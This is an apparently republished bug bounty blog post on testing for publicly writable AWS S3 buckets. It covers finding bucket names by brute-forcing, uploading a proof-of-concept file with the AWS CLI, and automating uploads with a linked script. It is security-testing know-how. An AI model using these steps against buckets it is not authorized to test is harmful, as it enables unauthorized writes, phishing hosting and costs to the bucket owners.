Testing for unauthorized file uploads on misconfigured AWS S3 buckets

3 years ago 248
BOOK THIS SPACE FOR AD
ARTICLE AD

alph4byt3

When I first started learning about bug bounty hunting, the first resource I used was Web Hacking 101 by Peter Yaworski. One of the bugs mentioned was that of a misconfigured AWS S3 Bucket which allowed anyone the ability to upload their own file/s to a ‘bucket’ that they do not own. This was fascinating to me because it seemed like there was hardly any effort involved and as I searched through different companies over the months, I was surprised at the amount of them that use AWS S3. In this article, I’d like to share ways in which one could test for such misconfigurations.

Let’s first start off by understanding what S3 is. Amazon Simple Storage Service (S3) is a service offered by AWS that provides object storage through a web service interface or a command-line interface. Objects such as files can be stored into ‘buckets’. Most of the time, these buckets are used to keep files such as images, audio files or JavaScript files depending on the need but another great usage case is static website hosting.

When creating a bucket, users are given the ability to name them, these can be named anything as long as the name does not already exist.

Creating a bucket

Users can then also set different permissions to the entire bucket or to objects within it using an access control list.

Setting access control permissions

As I’ve mentioned, buckets can also be setup as static websites, by providing an index page, a bucket can host a static page and users can link domain names that they own so that they can have a custom domain linked to their static site. If a domain name is not used, buckets can be accessed from a browser with the URL format of http://bucketname.s3.amazonaws.com

The AWS CLI

A cool thing about AWS is that it also has a command-line tool that allows you to interact with its services, S3 being one of them. The tool can be used to upload objects to a bucket, change their permissions, delete them etc. This makes working from the command line easy and efficiently if GUI’s are not your thing.

What can go wrong?

Now that we understand a little about S3, let’s talk about what can go wrong. As mentioned, buckets can be created with different sets of permissions but one of the more dangerous permissions is when a bucket is publicly writable. This means that any unauthorized/ ‘AWS authorized’ user that does not own the bucket can upload their own objects to it. Although it may sound like common sense to block all public write access, people do make mistakes and therefore some buckets can be misconfigured to allow such permissions.

Misconfigured access

Amazon has several warnings about this in their documentation.

Please note that in my testing, I am an authorized AWS user (aka I have an AWS account with security credentials setup) and therefore the methodology used below will require an AWS account, more on this later.

One of the first things we’d want to do is find bucket names. Bucket names can be named anything at all so caution needs to be taken because even if the name of a bucket is related to a company, it does not mean that the company is the owner of that bucket.

There are several ways to do this:

Manually finding buckets

While browsing through company assets, chances are you will find something like this…

The above bucket I created has public read access however majority of the time, buckets will be inaccessible such as below.

These are buckets that are properly configured to block all public read access (but this does not necessarily mean that write access has been blocked as well). Inaccessible buckets found through a domain name are hard to exploit due to the fact that we do not know the bucket name, there are circumstances when the bucket name is the same as the domain name and it’s worth a try.

2. Nuclei

Everyone’s favorite tool Nuclei by the team over at @ProjectDiscovery. Supplying a list of URL’s and using a template that can detect S3.

3. Brute-forcing names

The one I use the most and that has high success.

CloudBrute by @0xsha

CloudBrute is an amazing tool that can detect S3 buckets by brute-forcing names from a given wordlist and outputting them to a file.

Now that we’ve got a list of bucket names, let’s get down to testing. One of the first requirements is installing and configuring the AWS CLI (so that we may upload files from our machine to an S3 bucket).

On Linux, a simple:

sudo apt install awscli

will do

To configure the tool, you’ll need to first create an AWS account and create access credentials, please see https://docs.aws.amazon.com/general/latest/gr/aws-sec-cred-types.html

Take note of your secret key once created as you will no longer be able to view it again. Once you have both your access key and secret key, type ‘aws configure’ and fill in the information required. Once set, we can start testing.

Commands

To upload a file, the following command is used:

If the feedback returned is:

upload failed: ./poc-file.txt to s3://bucketname/poc-file.txt An error occurred (AccessDenied) when calling the PutObject operation: Access Denied

Then the bucket is properly configured and not vulnerable.

A successful upload should look like this

If you receive back this message, then your file was successfully uploaded and should now appear in the bucket.

In order to view this newly uploaded file, we’ll have to change the read permissions so that everyone can access it, to do this, use the command below:

The command should return nothing meaning it was successful. Now when we go to https://bucketname.s3.amazonaws.com/poc-file.txt, we should be able to view the file

e.g

Alert Box

Simple proof-of-concept file

Can we automate this?

Yes! Of course we can, I mean…why wouldn’t you, there are chances that you will have over a 100 bucket names in your list. Surely you wouldn't want to manually type the command for every name.

I’m no programming expert but I was able to put together a straightforward bash script that will iterate through a list of names and try each one.

The script can be found here https://github.com/alph4byt3/bucketUploader

Please, be my guest to make it better.

Impact

What can we do with such a vulnerability? Well, as I’ve shown in the example, I uploaded a proof-of-concept html file that alerts the user using JavaScript.

Malicious actors can create and upload fake login forms, phishing pages, malware or they can upload a lot of garbage files that costs the company money (S3 storage is not always free).

The impact of this kind of bug depends on the company but it usually falls between medium and high.

Ending

This is the first time I ever wrote an article related to bug hunting so I hope that the information here will help in some way or another. If you’ve made it this far, thank you.

Credit goes out to all that are mentioned.

Find me on Twitter https://twitter.com/alph4byt3

Regards

Read Entire Article